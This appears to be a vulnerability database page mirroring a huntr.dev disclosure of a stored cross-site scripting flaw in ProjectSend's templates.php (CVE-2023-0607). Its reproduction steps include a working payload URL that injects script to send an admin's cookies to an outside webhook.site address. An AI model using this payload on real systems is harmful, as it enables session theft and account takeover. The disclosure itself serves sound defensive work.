Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrD47sec9294743D-7818-4264-B973-59DE027D549B
HistoryDec 12, 2022 - 10:58 a.m.

Cross-site Scripting (XSS) - Stored

2022-12-1210:58:14
d47sec
www.huntr.dev
16
cross-site scripting
stored
parameter tampering
admin account
security vulnerability
information leakage

EPSS

0.001

Percentile

22.1%

JSON

✍️ DESCRIPTION

The activate_template parameter at line 16 of the templates.php file will be rendered at line 31 of file the dashboard.php page, without using the html_output() function.

💥 STEP TO REPRODUCE

  • Login to your admin account, then visit the URL http://localhost/projectsend-r1605/templates.php?activate_template=<img/src=x+onerror=window.location='https://webhook.site/5e0da962-936d-473e-91c4-9a70a4702779?'%2bdocument.cookie>

 
 
 

  • Then access dashboard.php malicious js code will be executed and the cookie will be sent to the attacker’s server

Related

osv 1
cve 1
nvd 1
cvelist 1
cnvd 1
prion 1
osv
osv
CVE-2023-0607
2023-02-01 04:15:09
cve
cve
CVE-2023-0607
2023-02-01 04:15:09
nvd
nvd
CVE-2023-0607
2023-02-01 04:15:09
cvelist
cvelist
CVE-2023-0607 Cross-site Scripting (XSS) - Stored in projectsend/projectsend
2023-02-01 00:00:00
cnvd
cnvd
ProjectSend Cross-Site Scripting Vulnerability (CNVD-2023-07917)
2023-02-09 00:00:00
prion
prion
Cross site scripting
2023-02-01 04:15:00

EPSS

0.001

Percentile

22.1%

JSON
Related for 9294743D-7818-4264-B973-59DE027D549B
osv1cve1nvd1cvelist1cnvd1prion1